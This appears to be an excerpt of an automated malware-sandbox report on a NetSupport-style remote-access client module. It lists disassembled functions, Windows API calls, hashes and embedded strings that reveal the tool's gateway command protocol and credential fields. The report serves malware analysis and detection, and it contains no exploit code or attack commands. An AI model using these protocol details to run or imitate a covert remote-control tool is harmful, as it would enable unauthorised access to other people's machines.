                                                                                                                                        • String ID: *ControlPort$*Gsk$AT=%d$CHANNEL=%s$CMD=BROADCASTDATA$CSPEC=%s$DATA=$FLAGS=%u$FROM=%s:%d$GSK=%s$Gateway_Gsk$LEN=%d$ListenPort$Port$TCPIP$ctl_broadcastdata - INVALID PARAMETER
                                                                                                                                        • API String ID: 1776203170-3520600413
                                                                                                                                        • Opcode ID: 9f5c28b980f3f5dbfb1d5f1e8f46af6200496184c99759ba8080f1e25c18ba00
                                                                                                                                        • Instruction ID: b4fb66244bfa7cbd91a8a03acf35cab042706bf8215df9f566d212f4958c8d94
                                                                                                                                        • Opcode Fuzzy Hash: 9f5c28b980f3f5dbfb1d5f1e8f46af6200496184c99759ba8080f1e25c18ba00
                                                                                                                                        • Instruction Fuzzy Hash: 57A17875944229BFDB20DB98CC88FAF737CAF95305F8045D9E159A6140EB30DA84CF61
                                                                                                                                        APIs
                                                                                                                                        • wsprintfA.USER32 ref: 688F9533
                                                                                                                                        • wsprintfA.USER32 ref: 688F9547
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688F9588
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688F95A9
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688F95CB
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,025E2EF8), ref: 688F962A
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,025E2EF8), ref: 688F966F
                                                                                                                                        • wsprintfA.USER32 ref: 688F970C
                                                                                                                                        • _free.LIBCMT ref: 688F9782
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcstoui64wsprintf$CriticalSection$EnterLeave_free
                                                                                                                                        • String ID: %02x $%02x %02x$CID$CRC$DATA$Error. Out of order packet, this seqno=%d, expected=%d$LEN$SEQ$Sessionz %dz #%u Recv %-4u bytes %s$actual_crc == crc$assume packet lost so we must disconnect$decodedlen == nc_len$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$xx %02x
                                                                                                                                        • API String ID: 3151195128-3323951505
                                                                                                                                        • Opcode ID: 0e1fa67c76b046108ef170aeacd10f2a4bb984486c860138b8e5d4a812515d58
                                                                                                                                        • Instruction ID: 1907a8074b155a666b71a882b6753829c7cd8ae47723ef13d7ebdab7f5f7408e
                                                                                                                                        • Opcode Fuzzy Hash: 0e1fa67c76b046108ef170aeacd10f2a4bb984486c860138b8e5d4a812515d58
                                                                                                                                        • Instruction Fuzzy Hash: 3E81DB75D44325AFDF209FA88C80BBE7778AF45388F904539F815A7241E735E9068BA2
                                                                                                                                        APIs
                                                                                                                                        • SetEvent.KERNEL32(00000318), ref: 688FEEC7
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000304,00001388), ref: 688FEED5
                                                                                                                                        • TerminateThread.KERNEL32(00000304,000000FF), ref: 688FEEF5
                                                                                                                                        • CloseHandle.KERNEL32(00000304), ref: 688FEF07
                                                                                                                                        • SetEvent.KERNEL32(00000310), ref: 688FEF16
                                                                                                                                        • ctl_hangup.HTCTL32(00000001), ref: 688FEF26
                                                                                                                                        • Sleep.KERNEL32(00000014), ref: 688FEFB8
                                                                                                                                        • CloseHandle.KERNEL32(00000318), ref: 688FEFCE
                                                                                                                                        • CloseHandle.KERNEL32(00000314), ref: 688FEFD6
                                                                                                                                        • CloseHandle.KERNEL32(00000310), ref: 688FEFDF
                                                                                                                                        • WSACleanup.WSOCK32 ref: 688FEFE9
                                                                                                                                        • CloseHandle.KERNEL32(00000300), ref: 688FEFFB
                                                                                                                                        • DeleteCriticalSection.KERNEL32(00000002), ref: 688FF01F
                                                                                                                                        • DeleteCriticalSection.KERNEL32(6893B898), ref: 688FF03A
                                                                                                                                        • _free.LIBCMT ref: 688FF043
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FF04F
                                                                                                                                        • _free.LIBCMT ref: 688FF07B
                                                                                                                                        • _free.LIBCMT ref: 688FF08D
                                                                                                                                        • _memset.LIBCMT ref: 688FF0A1
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 688FF0BB
                                                                                                                                        • timeEndPeriod.WINMM(00000001), ref: 688FF0D6
                                                                                                                                          • Part of subcall function 688F4610: DeleteCriticalSection.KERNEL32(-00000008,?), ref: 688F4698
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$_free$CriticalDeleteSection$EventFree$CleanupErrorHeapLastLibraryObjectPeriodSingleSleepTerminateThreadWait_memsetctl_hanguptime
                                                                                                                                        • String ID: CMD=CLOSE$Error. Terminating httprecv Thread
                                                                                                                                        • API String ID: 2861375113-448471891
                                                                                                                                        • Opcode ID: b6645bbf7550cae8485db53a2976ae405f5b0b667f7ddb2cc8c5bddee78c6b13
                                                                                                                                        • Instruction ID: 37edd1593a55095c82e82c0ffcc7f72b19983312c93718d37f5027c49af520b6
                                                                                                                                        • Opcode Fuzzy Hash: b6645bbf7550cae8485db53a2976ae405f5b0b667f7ddb2cc8c5bddee78c6b13
                                                                                                                                        • Instruction Fuzzy Hash: D3519475A08619AFDB30DFB8CC8096F73B8AF96348B800935E515D7640DB75E941CBA1
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 6891712F
                                                                                                                                        • __mtterm.LIBCMT ref: 6891713B
                                                                                                                                          • Part of subcall function 68916DFA: DecodePointer.KERNEL32(00000007,68915978,6891595E,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 68916E0B
                                                                                                                                          • Part of subcall function 68916DFA: TlsFree.KERNEL32(0000001B,68915978,6891595E,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 68916E25
                                                                                                                                          • Part of subcall function 68916DFA: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,68915978,6891595E,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 6891F391
                                                                                                                                          • Part of subcall function 68916DFA: _free.LIBCMT ref: 6891F394
                                                                                                                                          • Part of subcall function 68916DFA: DeleteCriticalSection.KERNEL32(0000001B,?,?,68915978,6891595E,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 6891F3BB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 68917151
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 6891715E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 6891716B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 68917178
                                                                                                                                        • TlsAlloc.KERNEL32(?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 689171C8
                                                                                                                                        • TlsSetValue.KERNEL32(00000000,?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 689171E3
                                                                                                                                        • __init_pointers.LIBCMT ref: 689171ED
                                                                                                                                        • EncodePointer.KERNEL32(?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 689171FE
                                                                                                                                        • EncodePointer.KERNEL32(?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 6891720B
                                                                                                                                        • EncodePointer.KERNEL32(?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 68917218
                                                                                                                                        • EncodePointer.KERNEL32(?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 68917225
                                                                                                                                        • DecodePointer.KERNEL32(Function_00026F7E,?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 68917246
                                                                                                                                        • __calloc_crt.LIBCMT ref: 6891725B
                                                                                                                                        • DecodePointer.KERNEL32(00000000,?,?,689158B5,68937218,00000008,68915A49,?,?,?,68937238,0000000C,68915B04,?), ref: 68917275
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 68917287
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                        • API String ID: 3698121176-3819984048
                                                                                                                                        • Opcode ID: 3192a3e9603f656bc7879c75a65e60241848448510c8405fe21f620736635f7d
                                                                                                                                        • Instruction ID: 0a3a35a83738db2d41967c9c59c86b7666e9b784fbd8655e5d4ecdd73dc6d466
                                                                                                                                        • Opcode Fuzzy Hash: 3192a3e9603f656bc7879c75a65e60241848448510c8405fe21f620736635f7d
                                                                                                                                        • Instruction Fuzzy Hash: FA31393AA4C22AEFDF729BB9C85861E7FB5AB77224B440526E46093390DBB1C441CF50
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 68904335
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 6890434A
                                                                                                                                        • GetTickCount.KERNEL32 ref: 6890440C
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68904417
                                                                                                                                        • Sleep.KERNEL32(00000014), ref: 6890442E
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 6890445E
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 68904494
                                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 689044BD
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$CountEnterLeaveTick$ErrorLastSleep
                                                                                                                                        • String ID: CMD=ADDDOMAIN$DESC=%s$FAILED$GSK=********$GUID=%s$KEY=%s$SUCCEEDED$W$ctl_adddomain %s (%d)$ctl_adddomain - INVALID PARAMETER$ctl_adddomain - OpenGatewayConnection2 FAILED (%d)$ctl_adddomain - finished waiting for reply$ctl_adddomain - waiting for reply$ctl_adddomain called
                                                                                                                                        • API String ID: 2245674308-2350087205
                                                                                                                                        • Opcode ID: 465c58f98e78d0cbe8b5714d5c23c4c0eddf6eaa5438eaaa7e6e1ff2641e7052
                                                                                                                                        • Instruction ID: 650f96ef42dd3f42b923b3434a5cd531c1e90878321230227712eae970519ac2
                                                                                                                                        • Opcode Fuzzy Hash: 465c58f98e78d0cbe8b5714d5c23c4c0eddf6eaa5438eaaa7e6e1ff2641e7052
                                                                                                                                        • Instruction Fuzzy Hash: AC5196B5C04219FFDB20DFECD884AAF77B8AF94359F808419E515AB200D735EA05CB92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 688F2ACB
                                                                                                                                          • Part of subcall function 688F2A90: _strrchr.LIBCMT ref: 688F2ADA
                                                                                                                                          • Part of subcall function 688F2A90: _strrchr.LIBCMT ref: 688F2AEA
                                                                                                                                          • Part of subcall function 688F2A90: wsprintfA.USER32 ref: 688F2B05
                                                                                                                                        • GetModuleHandleA.KERNEL32(NSMTRACE,688F2AB1), ref: 688F2CFA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceLoad), ref: 688F2D15
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceUnload), ref: 688F2D22
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigItem), ref: 688F2D2F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceGetConfigInt), ref: 688F2D3C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,vRealNSMTrace), ref: 688F2D49
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceClose), ref: 688F2D56
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceReadConfigItemFromFile), ref: 688F2D63
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceExclusive), ref: 688F2D70
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceUnexclusive), ref: 688F2D7D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NSMTraceSetModuleName), ref: 688F2D8A
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$Module_strrchr$FileHandleNamewsprintf
                                                                                                                                        • String ID: NSMTRACE$NSMTraceClose$NSMTraceExclusive$NSMTraceGetConfigInt$NSMTraceGetConfigItem$NSMTraceLoad$NSMTraceReadConfigItemFromFile$NSMTraceSetModuleName$NSMTraceUnexclusive$NSMTraceUnload$vRealNSMTrace
                                                                                                                                        • API String ID: 3896832720-3703587661
                                                                                                                                        • Opcode ID: 68004d826ec811331db320a6dcc2dd0e0e7a60156c67b78c2011bd0f7a5d1309
                                                                                                                                        • Instruction ID: 3da7614bab69048632d57f389fdec5ed3629601fd8071bd26a87eef6103accf4
                                                                                                                                        • Opcode Fuzzy Hash: 68004d826ec811331db320a6dcc2dd0e0e7a60156c67b78c2011bd0f7a5d1309
                                                                                                                                        • Instruction Fuzzy Hash: 660199B1C9A2746BCF70EB7A6C0CE8F3AE8ABD6351B410526F005E3640E6748845CFA1
                                                                                                                                        APIs
                                                                                                                                        • wsprintfA.USER32 ref: 688FD831
                                                                                                                                        • EnterCriticalSection.KERNEL32(?,000000FF,?,?,025E2DB0,00000000,00000002), ref: 688FD892
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 688FD8A2
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeavewsprintf
                                                                                                                                        • String ID: %02x $CID=%u$CMD=NC_DATA$CONNECTION_ID=%u$CRC=%u$Content-Length: nnnnn$DATA=$LEN=%d$NC_CRC=%u$NC_DATA$NC_DATA=$NC_LEN=%d$NC_SEQNO=%u$SEQ=%u$Sessionz %dz #%u Send %-4u bytes %s
                                                                                                                                        • API String ID: 3005300677-2101812351
                                                                                                                                        • Opcode ID: 49415f886126e178f3ffcfd78307e45dadc5ef1d58a874f60cd6c721fa045c95
                                                                                                                                        • Instruction ID: c8bd086ea540f42d3eb33fbbb42ffdc7c82b0978dc3c6ba7b24e7d970d3f3a10
                                                                                                                                        • Opcode Fuzzy Hash: 49415f886126e178f3ffcfd78307e45dadc5ef1d58a874f60cd6c721fa045c95
                                                                                                                                        • Instruction Fuzzy Hash: 4DA16476900218BFCB14DFE8CC84EEEB7B9AF99314F90491DE519AB241DB31E945CB90
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 689062F6
                                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 689065A3
                                                                                                                                          • Part of subcall function 688F8C30: _memset.LIBCMT ref: 688F8C5B
                                                                                                                                          • Part of subcall function 688F8C30: _free.LIBCMT ref: 688F8CCC
                                                                                                                                          • Part of subcall function 688F8B50: _memset.LIBCMT ref: 688F8B68
                                                                                                                                          • Part of subcall function 688F8B50: wsprintfA.USER32 ref: 688F8B87
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 689063C5
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 689063DE
                                                                                                                                        • _free.LIBCMT ref: 6890646E
                                                                                                                                        • _free.LIBCMT ref: 689064D2
                                                                                                                                        • _free.LIBCMT ref: 689064DB
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689064E9
                                                                                                                                        • GetTickCount.KERNEL32 ref: 689064F4
                                                                                                                                        • Sleep.KERNEL32(00000064), ref: 68906509
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 6890652C
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 6890657F
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_free$_memset$CountEnterLeaveTick$ErrorLastSleepwsprintf
                                                                                                                                        • String ID: N$CMD=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$ON=%s$PWD=%s
                                                                                                                                        • API String ID: 1201035089-3898729226
                                                                                                                                        • Opcode ID: 15c2c9a5ed23e4bf0f35beb41258026db5c37b49891daef4cf90e49af0245b84
                                                                                                                                        • Instruction ID: 8ae291e27023a60aa35bd29981b978a8859fe5626e08ed260806382db63b7749
                                                                                                                                        • Opcode Fuzzy Hash: 15c2c9a5ed23e4bf0f35beb41258026db5c37b49891daef4cf90e49af0245b84
                                                                                                                                        • Instruction Fuzzy Hash: 38918EB5D04319AFDB11DFE8CC84AAEB7B9AF49308F80452DE659AB244DB30D944CB90
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • _memset.LIBCMT ref: 68901816
                                                                                                                                        • __wcstoui64.LIBCMT ref: 68901B14
                                                                                                                                          • Part of subcall function 689149AE: strtoxl.LIBCMT ref: 689149D0
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901C12
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 68901C62
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901C95
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 68901CAC
                                                                                                                                        • std::exception::exception.LIBCMT ref: 68901CDA
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68901CF5
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave_memset$Exception@8Throw__wcstoui64_mallocstd::exception::exceptionstrtoxlwsprintf
                                                                                                                                        • String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TMG$TXT$UID$b
                                                                                                                                        • API String ID: 29704495-3942920506
                                                                                                                                        APIs
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688FA2B6
                                                                                                                                          • Part of subcall function 689149AE: strtoxl.LIBCMT ref: 689149D0
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688FA2D7
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688FA2F8
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,?), ref: 688FA35A
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,?,?,?), ref: 688FA39F
                                                                                                                                        • wsprintfA.USER32 ref: 688FA403
                                                                                                                                        • wsprintfA.USER32 ref: 688FA475
                                                                                                                                        • _free.LIBCMT ref: 688FA4BD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcstoui64$CriticalSectionwsprintf$EnterLeave_freestrtoxl
                                                                                                                                        • String ID: %02x $CONNECTION_ID$NC_CRC$NC_DATA$NC_LEN$NC_SEQNO$Sequence error! seqno: %u, previous: %u$Sessionz %dz #% Recv %-4u bytes %s$actual_crc == crc$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$seqno == (previous + 1)
                                                                                                                                        • API String ID: 247802158-3134913691
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 68904D1C
                                                                                                                                        • _free.LIBCMT ref: 68904E16
                                                                                                                                        • _free.LIBCMT ref: 68904E5D
                                                                                                                                        • _free.LIBCMT ref: 68904E8B
                                                                                                                                        • _free.LIBCMT ref: 68904EB9
                                                                                                                                          • Part of subcall function 68907B60: _sprintf.LIBCMT ref: 68907B77
                                                                                                                                          • Part of subcall function 689077E0: _free.LIBCMT ref: 689077EF
                                                                                                                                        • _free.LIBCMT ref: 68904EF6
                                                                                                                                          • Part of subcall function 688F63C0: EnterCriticalSection.KERNEL32(6893B898,00000000,?,00000000,?,688FD77B,00000000), ref: 688F63E8
                                                                                                                                          • Part of subcall function 688F63C0: InterlockedDecrement.KERNEL32(-0003F3B7), ref: 688F63FA
                                                                                                                                          • Part of subcall function 688F63C0: EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,688FD77B,00000000), ref: 688F6412
                                                                                                                                          • Part of subcall function 688F63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F643B
                                                                                                                                          • Part of subcall function 688F63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F646F
                                                                                                                                          • Part of subcall function 688F63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F64A3
                                                                                                                                          • Part of subcall function 688F63C0: _memset.LIBCMT ref: 688F65C8
                                                                                                                                          • Part of subcall function 688F63C0: LeaveCriticalSection.KERNEL32(?,?,688FD77B,00000000), ref: 688F65D7
                                                                                                                                          • Part of subcall function 688F63C0: LeaveCriticalSection.KERNEL32(6893B898,?,00000000,?,688FD77B,00000000), ref: 688F65F2
                                                                                                                                        • _free.LIBCMT ref: 68904EED
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 68904F09
                                                                                                                                        • SetLastError.KERNEL32(?), ref: 68904F12
                                                                                                                                          • Part of subcall function 688F8C30: _memset.LIBCMT ref: 688F8C5B
                                                                                                                                          • Part of subcall function 688F8C30: _free.LIBCMT ref: 688F8CCC
                                                                                                                                          • Part of subcall function 688F8B50: _memset.LIBCMT ref: 688F8B68
                                                                                                                                          • Part of subcall function 688F8B50: wsprintfA.USER32 ref: 688F8B87
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$CriticalSection_memset$AddressProc$EnterErrorLastLeave$DecrementFreeHeapInterlocked_sprintfwsprintf
                                                                                                                                        • String ID: CMD=PUTFILELINK$FNAME=%s$GSK=%s$Gateway_Gsk$Gateway_Operator$Gateway_Password$LINK=%s$ON=%s$PWD=%s$SUB=%s
                                                                                                                                        • API String ID: 2025600352-1925890548
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(winhttp.dll,27CEFB69,00000000,00000000,6890361E), ref: 68911177
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WinHttpGetIEProxyConfigForCurrentUser), ref: 689111AE
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 689111D4
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 689111E5
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 68911207
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WinHttpGetProxyForUrl), ref: 689112AD
                                                                                                                                        • __strdup.LIBCMT ref: 689112FC
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 6891130D
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 68911328
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 68911334
                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 6891134E
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 68911359
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Free$Global$AddressProc$Library$Load__strdup
                                                                                                                                        • String ID: NS247$WinHttpCloseHandle$WinHttpGetIEProxyConfigForCurrentUser$WinHttpGetProxyForUrl$WinHttpOpen$winhttp.dll
                                                                                                                                        • API String ID: 3412555560-1656063788
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • _memset.LIBCMT ref: 68900FAD
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901293
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 689012E3
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901316
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 6890132D
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6890135B
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68901376
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave_memset$Exception@8Throw_mallocstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TXT$UID$b
                                                                                                                                        • API String ID: 275297366-914382535
                                                                                                                                        APIs
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688FA057
                                                                                                                                          • Part of subcall function 689149AE: strtoxl.LIBCMT ref: 689149D0
                                                                                                                                        • ctl_getsession.HTCTL32(?), ref: 688FA09B
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,?), ref: 688FA0BA
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 688FA0EB
                                                                                                                                        • _strncat.LIBCMT ref: 688FA132
                                                                                                                                        • _free.LIBCMT ref: 688FA22F
                                                                                                                                        • _free.LIBCMT ref: 688FA238
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
